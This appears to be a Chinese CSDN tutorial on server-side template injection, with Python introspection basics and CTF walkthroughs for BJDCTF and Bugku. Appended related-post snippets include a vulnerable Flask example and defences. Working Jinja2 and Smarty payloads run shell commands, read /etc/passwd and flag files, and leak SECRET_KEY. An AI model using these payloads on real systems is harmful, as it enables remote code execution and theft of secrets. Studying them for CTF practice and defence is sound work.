SSTI模板注入总结

已于 2022-06-06 19:36:01 修改
阅读量1.7w 收藏 276
点赞数 52
分类专栏: 网络安全 web SSTI 文章标签: python 网络安全
于 2021-10-13 11:17:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Manuffer/article/details/120739989
版权

文章目录

一、初识SSTI

1、什么是SSTI?

SSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。

可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实际上这两者的思路都是相同的,因此可以类比来分析。

2、引发SSTI的真正原因

render_template渲染函数的问题

渲染函数在渲染的时候,往往对用户输入的变量不做渲染。

也就是说例如:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。

二、判断SSTI类型

上面提到网站模板引擎有jinja2、tornado、smarty、twig等等,那么如何判断遇到的是哪种类型?

广为流传的就是这张图了,根据处理返回值的不同来进行判别。(注意括号的数量等)

在这里插入图片描述

三、常用类

先举几个基础的例子方便理解:

1、class

__class__用来查看变量所属的类,格式为变量.__class__

>>> ''.__class__
<class 'str'>
>>> ().__class__
<class 'tuple'>
>>> {}.__class__
<class 'dict'>
>>> [].__class__
<class 'list'>

2、bases

__bases__用来查看类的基类,注意是的基类,所以格式为变量.__class__.__bases__

>>> ''.__class__.__bases__
(<class 'object'>,)
>>> ().__class__.__bases__
(<class 'object'>,)
>>> {}.__class__.__bases__
(<class 'object'>,)
>>> [].__class__.__bases__
(<class 'object'>,)

同时也能加上数组,比如变量.__class__.__bases__[0]来获得第一个基类。

值得一提的是还有个类是__mro__,它会显示类和基类,这是它和__bases__的不同。

>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)

3、subclasses()

__subclasses__()查看当前类的子类,格式变量.__class__.__bases__[0].__subclasses__()
这个类也可以加数组来查看指定的索引值,例如变量.__class__.__bases__[0].__subclasses__()[1]
在这里插入图片描述

>>> ''.__class__.__bases__[0].__subclasses__()[0]
<class 'type'>

这个时候就可以开始利用类里面的方法了。

示例:变量.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__,init初始化类,然后globals全局来查找所有的方法及变量及参数。

由此我们可以看到各种各样的参数方法函数,去找一个可利用的function来执行,比如popen的话,就可以这样利用:''.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']('dir').read()

大概是这么个原理,但这样说来还是不知道怎么利用,来看几道题就能更深刻理解了。

4、类的知识总结(转载)

__class__            类的一个内置属性,表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类,返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文,一个全局变量。

request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>

5、常见过滤器(转载)

常用的过滤器

int():将值转换为int类型;

float():将值转换为float类型;

lower():将字符串转换为小写;

upper():将字符串转换为大写;

title():把值中的每个单词的首字母都转成大写;

capitalize():把变量值的首字母转成大写,其余字母转小写;

trim():截取字符串前面和后面的空白字符;

wordcount():计算一个长字符串中单词的个数;

reverse():字符串反转;

replace(value,old,new): 替换将old替换为new的字符串;

truncate(value,length=255,killwords=False):截取length长度的字符串;

striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;

escape()或e:转义字符,会将<>等符号转义成HTML中的符号。显例:content|escape或content|e。

safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}}list():将变量列成列表;

string():将变量转换成字符串;

join():将一个序列中的参数值拼接成字符串。示例看上面payload;

abs():返回一个数值的绝对值;

first():返回一个序列的第一个元素;

last():返回一个序列的最后一个元素;

format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!

length():返回一个序列或者字典的长度;

sum():返回列表内数值的和;

sort():返回排序后的列表;

default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。

length()返回字符串的长度,别名是count

四、CTF例题

[BJDCTF]The mystery of ip

在这里插入图片描述

进来题目长这样,一看与ip有关,就可以想到可能与X-Forwarded-For或者client-ip有关了,不多说,上bp。
在这里插入图片描述

果然这里的IP是可控的,这道题比较有意思就在于:用{7*7}来判断一下发现这里居然是个SSTI注入。
在这里插入图片描述

尝试一下系统命令:{system('ls')},发现是可以使用的。

在这里插入图片描述

尝试直接{system('cat /flag')}发现是没有waf的
在这里插入图片描述

注:感兴趣的话可以自己去判断下这是什么模板引擎。这道题是Smarty的。

[Bugku]Simple_SSTI_1

进来查看源码,题目是这样的:
在这里插入图片描述

SECRET_KEY是什么?

SECRET_KEY其实就是一个加密盐,用在django和flask的session、cookies等加密中。

所以payload为?flag={{config.SECRET_KEY}}

为什么是config.SECRET_KEY?

因为一般定义SECRET_KEY的config.py的源码是这样的:

class Config(object):
    SECRET_KEY = "EjpNVSNQTyGi1VvWECj9TvC/+kq3oujee2kTfQUs8yCM6xX9Yjq52v54g+HVoknA"

所以当你要引用config的属性时是不是就应该用.来引用啦?

[Bugku]Simple_SSTI_2

进来还是提示要传入?flag=

那就来看一下/?flag={{config}},看到如下内容。
在这里插入图片描述

没什么有用的,既然如此就用ls来查看一下有哪些文件:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27ls%27).read()}}
在这里插入图片描述

直接cat flag完事:/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20flag%27).read()}}
在这里插入图片描述

参考链接:
https://blog.csdn.net/weixin_51353029/article/details/111503731
https://blog.csdn.net/zz_Caleb/article/details/96480967
https://blog.csdn.net/xiaolong22333/article/details/114228433?spm=1001.2014.3001.5501
https://blog.csdn.net/rfrder/article/details/113866139

PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 2024
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
PHP代码审计之SSTI模板注入
qq_22132931的博客
12-08 850
PHP代码审计之SSTI模板注入
SSTI(服务器端模板注入
z4yn:)的博客
02-26 538
SSTI(服务器端模板注入) 0x01 简介 模板引擎允许开发人员使用带有动态元素的静态HTML页面。例如,静态配置文件.html一个模板引擎将允许开发人员设置一个用户名参数,该参数将始终设置为当前用户的用户名 服务器端模板注入是指用户能够传入一个参数,该参数可以控制服务器上运行的模板引擎。 例如: 这引入了一个漏洞,因为它允许黑客将模板代码注入网站。从XSS一直到RCE,其影响可能是毁灭性的。 注意:不同的模板引擎具有不同的注入有效负载,但是通常您可以使用{{2+2}}作为测试来测试...
ssti漏洞的一些注意事项
2401_86405377的博客
03-08 560
lipsum :flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}__import__ : 动态加载类和函数,用于导入模块,经常用于导入os模块(例如__import__('os').popen('ls').read())是要查看的文件路径。__globals__:查看全局变量,有哪些可用的函数方法等,然后再搜索popen,eval等。
SSTI 模板注入
weixin_53150482的博客
07-18 1280
SSTI 模板注入
SSTI模板注入
热门推荐
huangyongkang666的博客
03-21 1万+
SSTI模板注入 1.SSTI简介 SSTI 就是服务器端模板注入(Server-Side Template Injection) ​ 当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。 ​ 漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将
CTF笔记 SSTI模板注入
qq_51248658的博客
10-21 1063
这次只是简单的把以前写的题目进行了总结,大致明白了解题步骤,但还是得多积累一些payload,以及绕waf的方法。这个可以去找sstilab通关相关内容进行学习,感觉那上面挺全的。
CTF SSTI模板注入详解
weixin_47696216的博客
03-31 5832
“百度杯”CTF比赛 十一月场 Web题:Fuzz python SSTI模板注入
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3960
web安全-SSTI模板注入漏洞
模板注入总结(SSTI)
qq_44657899的博客
02-14 5684
a. 获取变量[]所属的类名 {{[].__class__}} b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}} 没有内置的os模块的类 目录查询 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("
ssti模板注入
wangrong0966的博客
12-21 932
{{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /etc/passwd').read()}}{{".__class__.__base__.__subclasses__()[117].__init__.__globals__}} 查看全部全局变量,有哪些可以使用的方法函数等。使用Jinjia2中的"~"进行拼接:{%set a="__cla"%}{%set b="ss__"%}{{a~b}}
SSTI模板注入总结(web361-372)
m0_74402888的博客
07-29 887
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。此外,也可以这样{{config.__class__.__init__.__globals__['os'].popen('ls').read() }}一个过滤器的输出应用于下一个过滤器。
SSTI模版注入(初步)
2301_79783285的博客
08-11 823
SSTI模版注入(初步)ssti可能造成任意文件读取和RCE远程控制后台系统漏洞成因:渲染模版时,没有严格控制对用户的输入;使用了危险的模版,导致用户可以混合flask程序进行交互。flask是基于python开发的一种web服务器,那么也就意味着如果用户可以和flask进行交互的话,就可以执行python的代码,比如eval,system,file等等的函数。
ssti代码
最新发布
03-20
### SSTI(服务器端模板注入)概述 服务器端模板注入(Server-Side Template Injection, SSTI)是一种攻击形式,允许攻击者通过向应用程序发送恶意输入来操控服务器上的模板引擎行为。这种漏洞通常发生在用户输入未经过适当验证或转义的情况下被直接嵌入到模板渲染过程中。 以下是关于SSTI的相关代码示例、漏洞利用以及防御措施的详细介绍: --- ### 1. SSTI 漏洞代码示例 以下是一个基于 Jinja2 的 Python Flask 应用程序中的典型 SSTI 漏洞代码示例[^3]: ```python from flask import Flask, render_template_string, request app = Flask(__name__) @app.route('/') def index(): name = request.args.get('name', 'World') template = f'Hello {name}' return render_template_string(template) if __name__ == '__main__': app.run(debug=True) ``` 在这个例子中,`render_template_string()` 函数会将 `template` 变量的内容作为模板字符串解析并执行。由于用户的输入 (`request.args.get('name')`) 被直接拼接到模板字符串中,因此可能导致 SSTI 攻击。 --- ### 2. SSTI 漏洞利用过程 假设上述代码运行在本地环境,可以通过构造如下 Payload 来触发 SSTI: #### 构造 Payload Payload 示例: `http://localhost:5000/?name={{''.__class__.__mro__[2].__subclasses__()}}` 此 Payload 将返回当前环境中所有的子类列表,进一步可以尝试调用内置函数或其他敏感操作。例如,获取系统命令执行能力的 Payload 如下[^4]: ```jinja {{ ''.__class__.__mro__[2].__subclasses__()[77].__init__.__globals__.__builtins__.open('/etc/passwd').read() }} ``` 该 Payload 使用了 `.open()` 方法读取 `/etc/passwd` 文件内容,展示了如何通过 SSTI 实现远程文件访问甚至远程代码执行(RCE)的能力。 另一个更复杂的 Payload 是通过爆破 `subclasses()` 获取特定功能的方法索引,并最终实现 RCE[^5]: ```jinja {% set chr=[].__class__.__bases__[0].__subclasses__()[77].__init__.__globals__.__builtins__.chr %} {% set exec=''.join([chr(i) for i in [101,99,101]]) %} {{exec}} ``` 以上代码动态构建了一个 `exec` 字符串并通过模板引擎执行之。 --- ### 3. SSTI 防御措施 为了防止 SSTI 漏洞的发生,可以从以下几个方面入手: #### (1)避免直接传递用户可控的数据至模板引擎 应始终确保用户提交的数据仅作为变量值而非模板结构的一部分参与渲染。例如修改前面提到的应用程序为安全模式: ```python from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def index(): name = request.args.get('name', 'World') return render_template('index.html', name=name) if __name__ == '__main__': app.run(debug=True) ``` 在此情况下,`index.html` 中定义固定的模板逻辑,而不会接受来自 URL 参数的影响。 #### (2)启用沙盒机制 某些模板引擎支持开启沙箱模式以限制潜在危险的操作。对于 Jinja2,可通过设置 `sandboxed=True` 启动沙盒环境: ```python from jinja2.sandbox import SandboxedEnvironment env = SandboxedEnvironment() template = env.from_string(user_input) result = template.render(data) ``` 这样即使存在恶意输入也无法突破设定的安全边界。 #### (3)严格校验与过滤输入 对所有外部输入实施白名单策略,只接收预期范围内的字符集;或者采用正则表达式等方式剔除非法成分后再交由后续处理模块使用。 --- ### 总结 综上所述,SSTI 漏洞源于开发者未能妥善隔离不可信数据与模板语法规则之间的交互关系。通过对实际案例的学习可知,合理设计架构配合必要的防护手段能够显著降低此类风险发生的概率。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值